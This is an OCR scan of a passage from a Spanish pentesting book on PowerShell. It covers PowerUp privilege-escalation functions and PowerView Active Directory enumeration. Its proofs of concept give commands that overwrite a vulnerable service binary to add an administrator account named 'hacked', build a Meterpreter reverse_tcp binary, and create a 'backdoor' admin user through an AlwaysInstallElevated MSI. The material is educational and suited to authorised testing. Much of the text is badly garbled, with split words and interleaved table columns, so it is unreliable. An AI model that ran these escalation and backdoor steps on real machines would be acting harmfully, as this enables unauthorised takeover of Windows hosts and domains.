Estas funciones que se pueden visualizar en la tabla, permiten aprovecharse de fallos de configuración 


en servicios para llevar a cabo una obtención de privilegio. Ciertamente, están ligadas a la función 


z función Ger-RegAlwaysInstallEle 
l'indows está activo o no 4/way 
gecutar un instalador MS/ con 
como la de crea i i 
" r un usuario admini 

Pip nistra 
é p B Hia 

n usuario con privilegios en el sistema. 


La categoría de he 
infi 
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Get-ServiceEXEPer, G 
erms E 17. EY, 
E ns y Ger-ServicePerms, ya que éstas permiten sab É isos ti 

y si los servicios se pueden modificar. A e 


Para realizar DLL Hij kin exist P co 

tack, i 

| . Ce. y i ^ XxIsten otras funciones en owerU, A i ió 

ipci " p. ntinuación se muestra una 


Invoke-FindDLLHijack 


Invoke-FindPathHijack 


Descripción 
A oportunidades para realizar hijacking de DLL en los 

Isuntos procesos que se ejecutan en la máquina i 
Encuentra el path dónde se puede realizar el hijacking 
Tabla 3.06: Funciones para realizar DLL Hijacking. | 


Las aplicaciones utilizan las funcione 
s utiliza i. y 
cic mean l ! e s LoadLibrary() o LoadLibrarvEx() para cargar funciones 
adicionales /inkando con una librería dinámica. Cuando no se especifica " i 
s su 


decide el pius büsqueda de la DLL, empezando por el directori eT S eee 
si un usuario abre un fiche i icaci ir n HN : 
chero mediante una aplicación vulnerable a DLL Heber : e tme 

g y en el mismo 


directorio se encue ra una DLL m 
nt i iosg i 
7 à j sy Lt alici sa, la cual ha sido renombr ada como iei 

"n | j "elis E la original, otro usuar io 


^ S do sustituida or otra de vai se 
H 


cuando la aplicación careue See ig 
5 l li ! - l eva DLL para poder descifrar el I " "- Sis 
p B a nue fichero. 


Para realizar chequeo de configura o tri fi 
; sde " x 
ian € guraciones en el registro existen otras uncione: continuació 

muestra una breve descripción de ellas: i — " — d - 


Get-RegAhwaysInstallElevated 


Descripción 
Esta funció ea si 

nción chequea si la clave de registro A/wavs/nstallEle- 

vated se encuentra activa o no 


Est: ión c 
a función chequea para detectar configuraciones e 
de Autologon en el registro 


Get-RegAutoLogon 


rroneas 
Tabla 3.07; F tane zar ^ "On, ^ D "CRIS 
122 Punctanmes para realiza 
ele hë queo de Cot figur taciones en el y epi dro. 


vated chequea sien las ramas HKI M y HK( U del registro de 
"S vate: 1. t | m S 


código arbitrari i ivi 
go arbitrario, pudiendo elevar privilegio o realizar acciones 


dor. Si ió 
iren ird qiti: pee pe función devuelve true, se podrá utilizar la función 
or MSI que proporcione una aplicación que permita crear 


q 


mu ipci 
estra una breve descripción de ellos: 
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Función 


Invoke-AllChecks 


ados de las funciones de escalada 


Proporciona un informe con los result 
do en este apartado 


de privilegios que se han estudia 
Genera un paquete MSI que proporciona una aplicación par 
usuario como administrador u otro grupo de usuario 
útil para 
ara sustituir a 


a crear un 


Write-UserAddMSI 


Arranca un servicio a través del nombre de éste. Puede ser 


ndo se utilicen funciones de generación de binarios p 


Invoke-ServiceStart cua 
los binarios de servicios legítimos 


Detiene un servicio a través del nombre de éste 


Deshabilita un servicio 


Devuelve información detallada acerca de un servicio 


Tabla 3.08: Funciones Helpers de PowerUp- 

1lIChecks proporciona información interesante, quizá sea una de las primeras 
ue se mueve el pentester en el 

bre la pertenencia 

JAC, los servicios 


La función /nvoke 


funciones que deberían ejecutarse par 
ar en la imagen, la función retorna información so 


e comprobar un posible bypass L 
isos de los binarios de los servicios. los APATH% 
waysInstallElevated, etcétera. Un buen 


a conocer el contexto en el q 


equipo. Como se puede v isualiz 
del usuario al grupo administradores con el fin d 


que no tienen sus rutas entre comillas, los perm 


para un potencial hijacking de DLL, los valores de la clave 4) 
asesoramiento en la propia salida del script. 


resumen rápido con 
rNPouerüp? Invoke-fillChecks 


IPS C: NUsersNpgonzalezNDesktopNPouerToo ls-nmaste 


Running Invoke-fillChecks 
Checking if user is in a local group with administrative privileges... 
User is in a local group that grants administrative privileges! 
sUAC attack to elevate privileges to admin. 
mine exact membership. 


Run a Bypass 


Run *Invoke-CheckLocalAdmin —Verbose? to deter 


Checking for unquoted service paths... 
Use *Write-UserfiddServiceBinary” or ^|drite-CMDServiceBinary' to abuse 
C:\Program Files (x86 2 NRSUPPOR 


[+] Unquoted service path: Mobizen plugin — 
TNMobizenSeruiceMMobizenSeruice.exe 


xecutable permissions... 
^Urite-ServiceERECMD' 


[*] Checking service e 
EXE —ServiceName SUC’ or 


[x1 Use 'WUrite-Service 
se 

[+] Vulnerable service executable: Mobizen plugin — C:\Program Files 
NRSUPPORTNMobizenServiceNMobizenSeruice.exe 


[=] Checking service pernissions... 
Fig. 3.09: Reporte de resultados de las funciones de escalada de PowerUp. 
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2 E 
unciones como rite-l | € ck ) en crear pe etes de instale G arta ye 
" ag H y Ad, A 1 ^ar t i 
' 1S] y ermiten crear pa ] ¿LOS ] nst le lór que il t x 
aportan una pequen: 


aplicación dónde configurar el usuari 
megan a ein a se quiere crear y el grupo al que pertenece. Si existe una 
de funciones permiten arrancar y a : — - podrá realizar una escalada de priv MN EI A 
en ciertos momentos para lanzar ¿todo — ^ manera sencilla, las cuales pueden se tilize = 

anzar servicios que utilicen binarios manipulados. — 


Por ültimo, se trz ; 
. Se trata la categor "OS : 

acini Sas age ategoria otros que proporciona PowerUp. A conti E 
e descripción de ella: i P. ^ continuación se muestra una 


E [s a € c 
ncuentra ficheros de instal icion des tendida que pueden contener 


Get-UnattendecdlnstallFiles 
información sensible 


Chequea los fiche 
os ficheros web. confíe e 
-config en busca de strings 


E is : / à d CCLO- 
] c el po Ji de ap ICaciones y l 1S contraseñas ae l s dir 
h quea C Kk 


Get-ApplicationHost 
rios virtuales 


Chequea si el usuario es 
juea si el usuario es realmente un administrador local de la 


Invoke-CheckLocalAdmin 
maquina. Esto puede ser utilizado para pe 


nsar en un bypass UAC 


Tabla 3.09 Fun e iac Orta OFVOS ch O 7 ), 
! Unceionmes t ii f 
de la cate g € de / ert j 


PoC: Configuraci 
° uraciones erró as servici 
eines " $ erróneas en servicios que permiten escalada de pi ivil $ i 
esta prueba de concepto se tratarán : É i i ia 
se tratarán algunos fallos que pue í 
P algunos tallos que pueden encontrarse e intorno Wi 
cuales pueden provocar la escalada de privilegio. El escenario ; yc minm 
] ol | gio. El escena 's el siguiente: 
om — e guiente 
suario sin privilegio y acceso a una PowerShell 3.0 
- Equipo con Windows 8. Ñ 


-  Serinte de PhwewT] : 
scripts de PowerUp en el equipo. 


En prir 1e u se c A € € Ne 
a ratara ) ob > US C > ( 
Sal, : tratara 
[ I lema de las rutas sin co ill 15 de los ) irig d l se ( 
| 5 1 [ 1 ema: E pro lem 1 Se [ I L c € al " € Id c : c i 
as ) oduce de jido L ) | 
que es u hop I q ic el desa ollador d 1 apti C 
in nue cha aa PQ Ce Piar > d ” ^r - ne 
Servicio, v er — las ocasiones se ejecuta con e naximc c [ VHEgIOS, y 1 wein ; uc se 
dac 2 esta entre cc mill ^. I Oovoca ido que € p sar es € > o al | 
encuentra nario no Itr as I ıı pasar e: a ruta a services ex Ja uc 
us ise, bir ario pueda existir confusión. Esta contusion viene dada po que j id IWS t usct : das 
* p € 5. f I Y que va j obando 1 c ero en e c - 
AS pos ( ides JOT lO 1 ) ba 10 >s de fich r Sist a 


Para ejer ific jS c prop sc A ) L NOgral y Ue 
] nplifica: esto. y 
h 4 € N . SE prc "vici i 
L ] l fo Sof i "x , I F one e^ Crvicio A, con la ruta C 7 ogram file y (x86)! ipp rc of 1 
n ] » pc ateAdmin.exe. C uando esta g asc i À ó s a i | - im 
urgen; es I asada a services EXE, SQ sie 10 el si i 

uta es p | 2.CYX6€, ` gl siguiente 


- de lar za € program.exe. 
c C, S € S pé 1 A EKE 
I SIg S C C A Y Ogram file (X 6) 1 k 2X 
- Pos riormente. se com yueba en el siguiente e 1010 rog n 28 JO App . 


- Después, conti : 
, CO ac “program fi 
] ntmua con C: program files (x86) Apple Software.exe 


Pentesting con PowerShell 
sto abre una serie de Act : f à à 
l lIguno de los permisos de los binarios de éstos. Cuando se instala una 
arlo en alg S 


binario que éste lanza está mal configurado en lo que a permisos se refiere, se puede tener un agujero 
de seguridad importante. 


Capitulo III. PowerShell puro: El art 


lo] Most 
te del pentest 


También se debe hablar sobre debilidades en las configuraciones de los servicios a tra side tos 
alemmtará E 
arlo se ejecutará. 


que en caso de encontre i: i 
ar un binario malicioso y colocarlo en a'ua n 
ster tras lanzar la función Ger-5ervice. 


Asi hasta encontrar el binario, 
s 7 > ede gener 
oportunidad al pentester, ya que puede gene P 
paths intermedios. En esta prueba de concepto, €! 7 


aplicación que tiene algün servicio. y el 


Supóngase un ejemplo en el que el servicio A lanza un binario denominado pg _ctl.exe. Este binario 

tiene permisos por defecto que permiten que un usuario con menor privi egio pueda sobrescribirlo 
Path : GONRSUPPORTNM. . - Si se genera un binario, por ejemplo con A fetasploit, y se añade código arbitrario a éste. se podría 
ran Files 08 tomar el control de la máquina en remoto cuando se lance el servicio, 


—————————— C:NProg 


NPouerUp? (Get-ServiceUnquot 


D ktopNPow rTools-nmaster Para esta segunda prueba de concepto se utiliza la función Get-Servic eEXEP 
onzalez*Des Je 
IPS G:NUsersNpg 


- E izen Service.exe los binarios que no tienen los permisos bien configurados. En el ejem 
Pea Files «x86 )NRSUPPORIMHobizenSereiee on 2 la función devuelve que el binario MobizenService.exe tiene un 
¿Pr 2 ezNDesktop*NPFower E qr OC à i 
S Gilsersy onzal 10: Detección de un servicio sin comillas en la ruta del binario. por lo que puede ser sobrescrito por el usuario. 

Fig. 3.10: Detección € > 


erms, la cual detectará 
plo se puede visualizar como 
a configuración de permisos errónea. 


binario que intercalaremos en alguna ruta 
asión de antivirus para que el 


PS CiNUsers NpgonzalezNDesktopNPouerTools-mas 


ble, se debe generar el 

sc en la ev 
as, y pensando en la Meque | 
es ustrado con una generación rápida E A 
tep de Metasploit. 


terNPouerlp» Get-SeruiceEXEPer 
Tras detectar el servicio vulnera 
a. Se puede generar de muchas maner 


intermedi a prueba de concepto se ha il 


binario no sea detectado, pero para 1 
y sencilla a través del módulo payload/winc 


lows/meterprete! reverse 


213 


g. 3.13 Detección de binario con permisos mal configurados 


En esta ocasión el binario se generará con las funciones de PowerT Ip Write-ServiceEXE y Writ 
56.101 ServiceEXECMD. Para poder personalizar la instrucción a ejecutar se utiliza la siguiente instrucción 
Write-ServiceEXECMD —ServiceName “Mobizen plugin " -CMD “net user pablo 123abc. 
Mob net localgroup administradores pablo /add”. 


add &d 


Miri 

Fig. 3.11: Creación del binario malicioso. IPS C:NisersNpgonzalezNDesktopNPouerTool1s-nasterNPoverÜp? Get-SeruiceEXEPern 

i s 
: a gBepsBus je hay que tener 
: s se pueda escribir, ya qu : : 
media dónde se pl eme P IE > AS erviceName 
as dónde no pueda escribir. Tras verificar quese ie Path 
as dí ` 


servicio, se debe esperar a que se lance Mobizen plugin 


El binario resultante se coloca en la ruta En 
se puede encontrar rut 
leuna ruta intermedia del path del 


en cuenta que el pentester C:NProgram Files (x86»NRSUPPORTMM... 


puede alojar el binario en a 


vinisie el ssridéló. PS C:NUsersNpgonzalezNDesktopNPouerT ols-naster*NPouerllp» Write-SeruiceEXEGCM 
o remicie el s loit para tomar el control, D -ServiceName "Mobizen plugin" -CMD "net user hacked 123abc.. /add && net 
de Metasploit pare localgroup administradores hacked /add" 

[*1 Binary for service *Mobizen plugin’ with cusotm comnand 'net user hack 
Pa iedahec. radd && net localgroup administradores hacked /add' written to 


ps Program Files <x8B6 ARSUPPORT MobizenServiceWMobizenService.exe? 


CiNUsersipa onzalezWDesktopNPowverToo ls -—nasterNPouerlp» 


Fig. 


- m j > — | I . 
I 5 aso 1 opta COI figurar ej mo u mi Iti/handle j 
f este caso se ha optade ) g A C Ü l 


una vez s lava cut id y el cód go en la maq uina remota. 
I vez se | iyd ejecute € 1 € ] 
c aye 


3.14: Creación de binario personalizado con instrucción maliciosa 


Automáticamente, se habrá movido el binario original a una extensión .bak. y se dejará como binario 
2.168.1.15 :4444 -> 192.168.1.15:629: legitimo el malicioso. Ahora toca arrancar el servicio, o pararlo si estuviera arrancado. y para ello se 
E puede hacer desde services.msc. Una vez ejecutado el servicio, éste lanzará el binario sobrescrito y 
se ejecutará la instrucción prevista. 


z En este caso se podrá visualizar como se ha cread 


o un usuario denominado hacked, el cual pertenece 
al grupo administradores. 


Fi 3 Mención del maximo pri ilegio en remoto à raves de Meterpreter. 
] 1 moto a t le Met et 
ig. l Ot | mà [ eg p 
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ES. 1. ——— 


Nombre Nombre completo Descripción 


? inistrad Cuenta integrada para la administ... 

P, Administrador 

Cuenta integrada para el acceso Co. 
bi isbata e x 


Miembro de Pei | y » 


Miembro de: 


A | 
Je: Administradoras (| 


Je Usuarios 


ició j inistradares. 
Fig. 3.15: Creación de usuario y adición al grupo administi 


i ión de privilegio 
PoC: Configuración errónea en el registro que permite la obtención de p g 


E p a p q p ll 
INdOWS 

Er esta rueb 1 de conce to se trata un fallo con el ue se puede com rometer "Y entorno Y 

€ yn p E p 

i (0) fi ruración erronea puede p o a la escalada de p 1 il gl n 

Est 1 COT g e rovocar 1 rivilegio siempre cuando se cum la 


las condiciones. 


El escenario es el siguiente: — 
- Usuario sin privilegio y con acceso a una PowerShell 3.0. 
- Equipo con Windows 8. 
- Scripts de PowerUp en el equipo. 


¿LM como en HKCU, que indican 

En el registro de Windows existen dos rutas, tanto en la rama px — s UM e 
an el e rio con el que se ejecutan los paquetes de instalación / : e^ m UÁ 
i SCA "MACHI NEISOFTWARE Policies! Microsoft Windows £nsfa er. bs Ap de 
is - po diese denominada AlwaysInstallElevated. Si esta — m been ati 
"ui A e da si existe y su V ¿El , 

- vulnerable. Estará correctamente configura aom. Á E ria 
d y m y su valor es 1. La ruta en HKCU es HKEY CURRENT . 
configurada si exis | 
Policies Microsoft Windows Jnstaller. 


ió Si existe y el 
a anterior, que la configuración no e$ vulnerable. Si 


Si la clave no existe, ocurre como en | estar configuradas 


^ claves tienen que 

valor es 1. la configuración es vulnerable. En resumen, ambas 
a * 
a valor 1. snl 
: valor true o false p 
ji sInstallElevated se devolverá un và 
j unción Get-RegAlwaysInstallEleva 

Al ejecutar la función Ge 


., n 
H ^ ES - t s 1 fi e u 

si la configuración es vulnerable o no. Añadiendo el parámetro vel bose a š a nes S I 
. H 1 E ecutar es el 


RegAlwaysinstallElevated —Verbose. 
mmm 


Además, Powe 
hetview eve 
funciones q 


Para ejecutar estas funciones sobre 
« 
"ombre del archivo 


Sjecutar el fichero psi 
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PS C:NUsersNpgonzalezNDes 
llElevated -Verbose 
ETALLADO: HKLMual: 1 
ETALLADO: HKCllual: 1 
DETALLADO: AlvaysInstallElevated enabled on this 
rue 


ktopNPouerTools—-nmas ter*NPouer 


Up» Get-Regfiluaus 


machine! 


Fig. 3.16: Detección de configuración errónea de A hwavsinstallElevated. 
Una vez detectada la configuración errónea. el pentester tiene claro que puede lanzar un paquete MSI 
de instalación con el máximo privilegio, aunque su usuario no tenga privilegio. La función Write- 
UserAddMSI permite crear un archivo MSZ, el cual contiene una aplicación que mostrará un panel 
con el que se puede crear un usuario, indicando su contraseña y el grupo al que pertenecerá. 


Tras ejecutar Write-UserAddMSI se podrá utilizar el paquete 
administrador en el equipo. Como se puede visualizar en la i 
sencillo y la elevación de privilegio es todo un éxito. 


MSI para crear un nuevo usuario 
magen, el panel de la aplicación es 


Usemame 
backdoor 


Password 
password123 


Group 
| ^dministradbres 


Fig. 3.17: Creación de usuario a través de aplicación lanzada eon un paquete MS] 


PowerView 


PowerView es un conjunto de herramientas escritas en PowerShell para obtener conocimiento de la 
red en un dominio de Microsofi Windows. PowerView cor 

los cuales utilizan ho 

cabo algunas funcionalidades útiles. 


tiene un conjunto de funciones de tipo net, 
oks para Active Directory y utiliza funciones de la AP] de Win32 para llevar a 


er View también implementa varias metafunciones. incluy 


y algunas funciones que identifican usuarios en la red. 
ue forman Power View, y se 


endo un port de la herramienta 
Más adelante se describirán las 
podrán detectar miles de usos en un pentesting. 


una máquina se puede ejecutar la instrucción import- 


module 
Ps1>. Otra opción sería ejecutar PowerShell -exec bypass y e 


n esa sesión 


Pentesting con PowerShell 


AAA 


en D > q p p ciona 
. g p ] [4] | on: 
r E 


- Funcionalidades de red. 
- Las funciones user-hunting. 


- Metafunciones y otros. 


d: 


Ger-NetDomain 


Descripción 


inio actual, los controladores de 
ista el nombre de dominio ac s d 
cute existentes, el PDC, el RID y el modo de dominio 


minio. los sitios, el 

i ió el nombre del do 

M nformación sobre : mel 

—— obal el esquema en nomenclatura de Active Dir ; 
o ; ; 

aita etcétera 


ini | forest 
Muestra información de todos los dominios del actual ft 
- i dominio. 
is controladores 
ista infi ión sobre los distintos c 
è lista información so - 
j as la versión del sistema operativo de I = E 
ecntrodler la dirección IP, la sincronización horaria, 
particiones, etcétera 


Get-NetForest 


Get-NetDomainControllers 


Muestra el usuario actual en la red 


z : i orciona 

Muestra todos los objetos de tipo Boga im 
; " d 

; s s los usuarios de bie 

información sobre todo email. categoría del objeto, homedrive, 


xs mbre. apellidos, i ; —— 
E E ce se ha «y object guid, adspath, identificad 
vec ) 


i información, 
imario, SID, etcétera. Es realmente útil e eir 
T! , ? B Wr. anis or 
dn una fase de recopilación de informacion de 
e 


Get-NetUser 


p p S 
Lista lo rinci sno nbre de servicio de lo usuarios 


Lista las unidades organi 'ativas del dominio en no 

Active Director y 

Encuentr Q ye as a un ecifico 
LI iñade un us o loca n io SIC e q e sea posible 


Az — 

Muestra información para cada m d eT 

h 
i os locales sobre un 
ra el listado de grup 

Muest | 
bros de un grupo local sobre un equi 
sobre un listado de equipos 


po remoto 0 


Lista los miem 


Get-NetLocalGroup 
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Get-NetLocalServices 


Invoke-NetGroupUserAdd 
Get-NetComputers 


Get-NetFileServers 


Lista un conjunto de servicios que se están ejecutando sobre una 
máquina remota o un listado de máquinas 

Añade un usuario a un grupo local o de dominio especifico 

Consigue un listado de equipos y servidores en el dominio 


Proporciona un listado de servidores de archivos utilizados por los 
actuales usuarios del dominio 


Indica información de recursos compartidos de un equipo de la 
red. Se debe utilizar el parámetro hostname 


del equipo 
Lista los usuarios logados con actividad en un servidor específico 
Lista sesiones activas sobre un servidor específico, indicando qué 
usuario es el que tiene dicha sesión 
Devuelve la combinación entre la ejecución de Get- 
comando Ger-NetSessions. En caso de que alguno 1 
resultados, el resultado será nulo 


Get-NetShare 


Get-NetLoggedon 


Get-NetSessions 


para indicar el nombre 


NetFiles y el 
10 devuelva 


Get-NetFileSessions 


: : ' Lista las conexiones activas mostrando los recursos comp 
Get-NetComections 


artidos 
de un servidor o máquina específica 


Lista las sesiones RDP activas sobre una máquina concreta 


Muestra el listado de ficheros abiertos sobre una máquina 


Cura Muestra el listado de procesos, con el propietario del mismo, 
CINE cesses n . 7 . E A 
sobre una máquina específica, pudiendo ser una máquina remota 


Tabla 3.10; Funcionalidades de red de PowerView. 
Estas funciones permiten conocer más e 
de unidades organizativas que existen e 
un conocimiento amplio sobre e 


| listado de dominios, de usuarios. de grupos, de recursos o 
n la red a auditar. Son funcionalidades que permiten obtener 
| entorno en el que el pentester se encuentra. 

A continuación se 


detallan las funciones proporcionadas en la categoría user-hunting: 


Descripción 
Encuentra máquinas en el dominio dónde un usuario específico 
se ha logado. e incluso puede chequear si el usuario tiene acceso 
como administrador local de las máquinas encontradas 


IPoke-UserHunter. Threaded Versión con threads de Invoke- 


UserHunter 


Encuentra los servidores de ficheros utilizados en los directorios 
de los usuarios y chequea las sesiones sobre cada servidor de 
archivos 


Invoke-Stealth UserHunter 


Pentesting con PowerShell Capitulo IIl. PowerShell puro: El arte del i 
: el pentesting 


ep A continuación ¿ sis 
Descripción à; se detallan las metafunciones y el resto de funciones 

ES otros de Power View: ciones que se agrupan en lë i 
s máquinas del Ñ a categoría 
suario concreto 


Encuentra los procesos que se ejecutan en la 
voke-UserProcessHunter sie ; e 
sidonia * dominio que corren bajo el privilegio de un u 


Enumera procesos con un nombre específico que se encuentra D cam 

Invoke-ProcessHunter P : : — escripción 
corriendo en diversas máquinas 

ventos de /ogon solicitando a los domain controller 


esta información 


Es un por. - i 
fni " , de la herramienta netview.exe utilizando las 
I: : ades Get-Net *. Encuentra máquinas sobre un 
2... is ocal Mc een varios métodos para enumerar 
compartidos. Además ite visuali 
š . permite visualizar sesiones 
e € i r sesiones 
Interesante comando para la fase de descubrimiento 
de red 


Versión con threads de Invoke-Netview 


En 

: I y enumera los recursos compartidos de los 
quipos que forman parte de la red. Utiliza técnicas no 

estándar para ello 


Enumera e 
Invoke-Netview 


er-hunting de PowerView, 


Tabla 3.11: Fi uncionalidades de us 


as en la categoría relaciones de confianza en 
Invoke-NetviewThreaded 


ción se detallan las funciones proporcionad 


A continua 
dominios: 


Invoke-ShareFinder 


Descripción 

a todas las relaciones de confianza del actual 

Lista todas las relaciones de confianza del actual dominio, 
pero solo utilizando LDAP. Esto permite hacer relay de 

todo el tráfico a través de tu DC primario 

ta todas las relaciones de confianza para los forest 


asociados con el actual usuario del dominio 
de su 


dominio 


List 


Invoke-hareFinderThreaded 


Versión con threads de Invoke-ShareFinder 


Get-NetDomainTrustsLDAP 
Enc ET : 
cuentra archivos potencialmente sensibles sobre los 


equipos de un dominio local 
Versió : 
ersión con threads de Invoke-FileFinderThreadecd 


Invoke-FileFinder 


Lis 
Invoke-FileFinderThreadecd 


mera los usuarios que están en grupos fuera 
principal dominio 


Enu 


En áquinas 
E € máquinas en las que el usuario que ejecuta el 
mando tiene acceso como administrador local 


Invoke-FindUserTrustGroups 
Invoke-dLocalAdminAccess 


umera todos los 
de su principal 


Mapea todos los domain trusts y en 


usuarios que están en grupos fuera 
dominio 


Invoke- 
LocalAdminAccesThreaded 


Versión con threads de Invoke- 
FindLocalAdminAcces Threaded 


Invoke-FindAllUserTrustGroups 


Enumera todos los miembros de un grupo de dominio 
y encuentra los usuarios que están fuera del dominio 
consultado. Se debe indicar un dominio 
todos los domain trusts y enumera grupos con 
usuarios fuera de su principal dominio 
Enumera miembros del grupo de administradores 
cruzados 


Se reali Us i 
: liza una büsqueda de usuarios a través de un campo 
omo por ejemplo su nombre. Es necesario utilizar cl l 
Wee term para indicar el término que se quiere 
chear y el parámetro field para indicar sobre qué campo 
w A £ E 
se realiza la búsqueda del término 
al al comando /nvoke-UserFieldSearch. con la 
: ncia de que las büsquedas se realizan sobre máquinas 
nc M "Qc 
A. e sistemas que parecen vulnerables a algunos 
3 - s conocidos. El detalle de los exploits que se pueden 
izar se encuentra comentado en el código fuente de 
PowerView 
Lis n 
ta — LAPS, Local Administrator Pas. 
olution, para cada cuenta de equipo 


Invoke-FindGroupTrustUsers 


Invoke-UserFieldSearch 


Mapea 


Invoke-FindAllGroupTrustUsers 


Invoke-ComputerFieldSearch 


Invoke-EnumerateLocalTrustGroups 


Versión con threads de Invoke- 
EnumerateLocal TrustGroups 


Se intenta construir un mapa relacional de todos los 
domain trusts 

relacional de todos los 
NetDomain Trusts LDAP 


Invoke-EnumerateLocalTrustGroup 
sThreaded 


Get-ExploitableSystems 


Invoke- MapDomain Trusts 


Se intenta construir un mapa 
sword 


domain trusts utilizando Get- 


Invoke-MapDomain TrustsLDAP 


Tabla 3.12: Funcionalidades de domain trust de PowerView. 


+ "—— 9 


——————— b i OO O ax... DS. 


| 130 | Pentesting con PowerShell 
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Í pentesting 


Descripción Como se puede ver en las tablas ante 


ae ; riores, existe ; í T 
extraer un gran volumen de inform iste un gran nümero de funcionalid 


ación del dominio y de las m 


e ades con la que 
&quinas que componen éste. 


Se ejecuta todos los chequeos disponibles para enumerar 
recursos compartidos, objetos de tipo usuarios logados, 
sacar información de directorio, enumeración de grupos 
locales y usuarios, etcétera. Todo esto indicando con el 

parámetro HostName la máquina sobre la que se lanzará este 

todo en uno 


Estas funcionalidades unidas a técnicas de el 


lateral a través de P, evación de privilegi d i 
S de Pass ed ` I egio en el i > imi 
Pass the Hash permiten ir avanzando en 1 E 


ara una itoría e : i ilació i 
- miditada un ds red idos a recopilación de información valiosa 


Invoke-HostEnum 


PoC: Resumen de PowerView 


Aunque todos los comandos son v 
de las condiciones de 


Enumera los miembros del grupo administradores de las 
máquinas del dominio, siempre que se pueda 


Invoke-EnumerateLocalAdmins 


aliosos y pueda ili 
S n ser utilizados en i 
piema Porta pt s en cualquier momento. e 


y i E 
peaosi Hay que tener en cuenta que las c 
pueden hacer que se necesite la ejecución de una u 


» n función 
r se enc n 3 
ndi: d mium se ha querido resumir algunos 
n las que el pent > > A 
e " ester se e e 
otra funcionalidad, BGMEDUS, 


Invoke- 


] Versión con threads de Invoke-numeraLocalAdmins 
EnumerateLocalAdmins Threaded 


Resuelve un nombre de máquina a una dirección IP. Esto 
puede ser bastante útil para conocer las direcciones IP de 
las máquinas del dominio. Si no se introduce el parámetro 
hostname, se coge por defecto la máquina local 


Uno de los pri 
imeros comandos y que más infi 
"ehe pci des y que más información puede devolver es Ger-N 
puede encontrar pa información sobre todos los usuarios d l di tes LM 
—€—X cantidad de correos electrónicos, SID unidad o à 
gueo, O de contraseñas, el path de ADS. certificado si ést iliza 
; ste utiliz 


Get-HostIP 


TIO activo, por lo que se 
anizativas, información de 
a, etcétera. 


Permite modificar los atributos de un fichero 
— ote cope — |. Copia un archivo local una ubicación remota | 
Prueba la conectividad con una máquina específica 
Lista las propiedades para un usuario específico 


ades para un equipo específico 


Para convertir los 
i os SID que se 
3 se pue enc s 
SidToName. Como se SEM por el dominio se puede utilizar el c R 
viceversa es visualizar en la imagen, converti > à comando Conver- 
sa es realmente sencillo o ertir de SID a nombre de usuario 
; ` a . 


y 


Lista las propied 
Indica el ültimo usuario logado en el equipo indicado 


Name: PS G:*NÜsers 
neToS id Ser sNpgonzalezNDesktopNPouerTools-mas 


terNPoverUieu» Convert-N 


cndlet Conu 
ert- o4 
eed rt-NameToSid en la sició 
porcione valores posición 1 de la c i 
S para los parámetros siqui e ación de comand 
Eros siguientes: í es 


Devuelve eventos de /ogon de una máquina específica, 
siempre y cuando se tenga acceso 


N pablo .gonzalez 
5-1-5-21-3294238174 


PS C:NUsers 
E er s*NpgonzalezNDesktopNFouerl 00 


T1117 


Devuelve eventos de peticiones TGT en una máquina 
1s-mas "NP . 
nasterNPouerUieu» Convert-S idToN 
rt E. 


específica 


cndlet Convert-Si 

Proporcione val: idToName en la posició 

TODOPcC valores A 2 posición 1 de la e i 5 

SID: $-1-5—21-32980230174 los parámetros no lización de comandos 
\Pàblo. Gonzalez ————— d —— 117 


PS C:NUsersN 
t sers onzalez sk 
ic NDesktopxPowerToo ls-nasterNPowerUi 
Fig. 3.18: Conversión de SID a nombre cone 


Chequea si el usuario actual tiene acceso como 
administrador local en una máquina específica 


Realiza búsquedas sobre un path local o remoto para 
encontrar ficheros con términos concretos en su nombre. 
Este comando es útil para realizar búsquedas de ficheros 

en las máquinas del dominio. Se debe indicar el parámetro 

terms 

Convierte un nombre de usuario O nombre de grupo a un 

SID. Se debe indicar el parámetro name 

Convierte un SID, Security Identifier, a un nombre de 

usuario o nombre de grupo. Se debe indicar el parámetro 

SID 


Invoke-CheckLocalAdminAccess 


Invoke-SearchFiles Ot — 
roc îti 
eerie muy útil es Znvoke-Netview 
1, Se puede r le i i 
p encontrar las sesiones aar en la 


C 
i € on este comando, como se puede v 
PONA à activas qu as disti 3 
ursos compartidos de estas, etcétera ias tinae del dominis, li 
: | ^ s 


Esta infi ió 

Fi información es útil para poder t 

EC m todo el dominio simplemente 
una máquina o un conjunto de 


" -— 

ner una visión clara del dominio. El comando 
ejecutando Invoke-Netview 
máquinas se puede utilizar 


eri interesante es CheckSha 
uestran, indicando sólo los que 


: puede lanzarse 
! por el contrario se quiere lanzar 


el parámetro hosts y hostList. 


Convert-SidToName 
Otro 
que 'eAcces. 3 

5, el cual hará de filtro sobre los recursos compartidos 


Tubla 3.13: Metafunciones y otras funciones de PowerView. 
el i : 
usuario que ejecuta el comando tiene acceso 


DS M1 PlEO | | | 
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rUiew> I nvoke-Netuiew — 


S e pgonzalezwDes ktopvPouerTools masterNPoue 
osts P11P-07 
unning Netvuiew with delay of B 

Domain Controller: DCA3. 

Domain Controller: pcg2. 

Domain Controller: DCA. 

Domain Controller: DCA4. 

Total number of hosts: 1 


Server: P11P-97 

IP: 172.16.18.283 169.254.148 .79 192.168.1.15 

P11P-07 - Logged-on — Pablo -Gonzalez 

Pi1P-07 Logged-on — aPablo. Gonzalez 

P11P-87 Logged-on NNPablo.Gonzalez 

p11P-87 Logged-on — wNPablo.Gonzalez 

P11P-97 Share: ADMINS Admin remota 

P11P-97 Share Recurso predeterminado 

P11P-87 Share Recurso predeterminado 

Pi1P-87 Share Recurso predeterminado 

Pii1P-07 — Share IPC remota 

P11P-07 - Share: print$ Controladores de inpresora 
Share: PoesktopsPouerToolssnastonsPoue E 


Fig. 3.19: Recolección de información con Invoke-Netview. 


Uno de los comandos importantes que se han estudiado en las tablas anteriores es /mvoke- 


LocalAdminAccess. Gracias a este comando se pueden encontrar máquinas en el dominio en las 


Find 
za el comando tenga privilegio de administrador. Si una de estas máquinas es 


que el usuario que lan 
encontrada, se podría lanzar un emd remoto y después, por ejemplo, ejecutar un proceso como una 
Meterpreter e i ganando más funcionalidades. 

En la mayoría de los casos, un usuario normal del dominio no tendrá privilegios de administrador 
aunque pueden existir máquinas que tengan Como función principal servir archivos 


en las máquinas. g 
dónde se den ciertos privilegios a todos los usuarios. En otras ocasiones, también puede ser que 


un usuario normal también tenga el máximo privilegio en máquinas compartidas que centralizan 


funcionalidades. Sea como sea, este comando encontrará estas máquinas € indicará que el usuario 


que se utiliza tiene privilegio de administrador en dichas máquinas, tal y como puede verse en la 


imagen. 


DETALLADO: [1 Enumerating server USS-SUN Server. ES 24) 
DETALLADO: L*] Enumerating server Dca3. TT (12 of 245 
